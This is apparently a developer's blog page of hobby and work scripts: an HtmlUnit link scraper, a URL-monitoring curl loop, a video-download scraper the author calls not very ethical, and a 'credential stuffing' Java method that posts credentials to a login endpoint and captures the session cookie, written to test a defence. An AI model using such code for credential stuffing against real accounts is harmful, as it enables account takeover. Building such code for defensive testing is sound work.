Web Scrape Examples
Over the years, I've built a collection of small scripts that I use to crawl and fetch data for myself. These are all pretty hacky and quick, but I often find useful.
Scrape to MySql
This particular script was used to pull links off a page at work. Every hour it will crawl a page and collect domains. The domains themselfs act as primay keys, and prevents duplicates. This is a good example of how to use HTMLUnit to fetch data.
public void runMe() { try { webClient = new WebClient(BrowserVersion.FIREFOX_38); //webClient.getOptions().setThrowExceptionOnScriptError(false); page = webClient.getPage(url); //scrollToBottomOfPage(); final List<?> sectionPlayers = page.getByXPath("(//div[@class='section-asdf'])"); //get all section players on page for (int i = 0; i < sectionPlayers.size(); i++) { //loop through them System.out.println("NAWICE... Lets get the asdf links!"); HtmlDivision htmlDivision = (HtmlDivision) sectionPlayers.get(i); if( htmlDivision.getElementsByAttribute("a", "class", "toggle-asdf").size() == 1) { //more than one blog posted List repostLink = htmlDivision.getElementsByAttribute("a", "class", "toggle-asdf"); //get the link to show posts repostLink.get(0).click(); webClient.waitForBackgroundJavaScript(5000); //wait for the ajax page to reload printLinksInSectionPlayer(htmlDivision); //print the new visible links List showMoreLink = htmlDivision.getElementsByAttribute("a", "class", "fav-asdf"); //get the show more link if ( showMoreLink.size() == 1) { //if we have a show more link... showMoreLink.get(0).click(); //click it webClient.waitForBackgroundJavaScript(5000); //wait for the ajax printLinksInSectionPlayer(htmlDivision); //print the new visible links while (htmlDivision.getElementsByAttribute("a", "class", "fav-asdf").size() == 2) { //if there are two links we have a next and prev button showMoreLink = htmlDivision.getElementsByAttribute("a", "class", "fav-paging"); //get the next and prev buttons showMoreLink.get(1).click(); //click the next button webClient.waitForBackgroundJavaScript(5000); printLinksInSectionPlayer(htmlDivision); //print the links } } } else { printLinksInSectionPlayer(htmlDivision); //only one blog post this print it } } webClient.closeAllWindows(); } catch (Exception e) { System.out.println("Welp, something went wrong..."); e.printStackTrace(); } System.out.println("DING! Toast is done!"); }
Credential Stuffing
After the Yahoo! email security breech, we discovered automated scripts using credential stuffing methods to access a client's domain. Here I wrote a similar attack, and used it as a test case to prove our solution worked. Here's a sampe of it.
private String getAuthToken(String username, String password) throws Exception { String url = "https://" + endpointPrefix + ".example.com/j_spring_security_check"; URL obj = new URL(url); HttpURLConnection con = (HttpURLConnection) obj.openConnection(); con.setInstanceFollowRedirects(false); //add reuqest header con.setRequestMethod("POST"); String urlParameters = "j_username=" + username + "&j_password=" + password; // Send post request con.setDoOutput(true); DataOutputStream wr = new DataOutputStream(con.getOutputStream()); wr.writeBytes(urlParameters); wr.flush(); wr.close(); printTheRequest(con); String authToken = ""; List cookiesHeaders = con.getHeaderFields().get("Set-Cookie"); for (String cookieHeader : cookiesHeaders) { HttpCookie cookie = HttpCookie.parse(cookieHeader).get(0); if ( cookie.getName().equals("EXAMPLE_WD_WLJSESSIONID") ) { authToken = cookie.getValue(); } } return authToken; }
Monitor URL
This little bash script comes in handy when you're trying to prove a url is inconsistenly loading. Every 10 minutes I use curl to visit a page and print it's response code. In the case of this issue, our server had a different DNS server than our firewall, and recived an IP address to connect to that was not opened.
#!/bin/bash # I often use this script to monitor connectivity. The output # can be sent to your infrastructure team to prove a point... while [ 1 ] do echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> jm_watch_url.txt echo `date` >> jm_watch_url.txt echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> jm_watch_url.txt curl -v https://www.google.com/recaptcha/api/siteverify 2>&1 | tee -a jm_watch_url.txt sleep 1200 done
Video Scaping
Alright, maybe this one isn't all that ethical. I came across a series of videos online but the were buried in just about the worst online adds. This script was used to pull a list of all the urls, and store them in a local in memory database (actually persisted to your local disk). This meant I could shut down the script and allow it to resume downloading the videos laters. It also means I didn't have to restart from video one if something went wrong.
@Bean public CommandLineRunner commandLineRunner(ApplicationContext ctx) throws Exception { //GetWebsiteB getWebsiteB = ctx.getBean(GetWebsiteB.class); //getWebsiteB.gatherLinks(); //getWebsiteB.downloadLinks(); GetWebsiteA getWebsiteA = ctx.getBean(GetWebsiteA.class); getWebsiteA.gatherLinks(); getWebsiteA.downloadLinks(); return null; }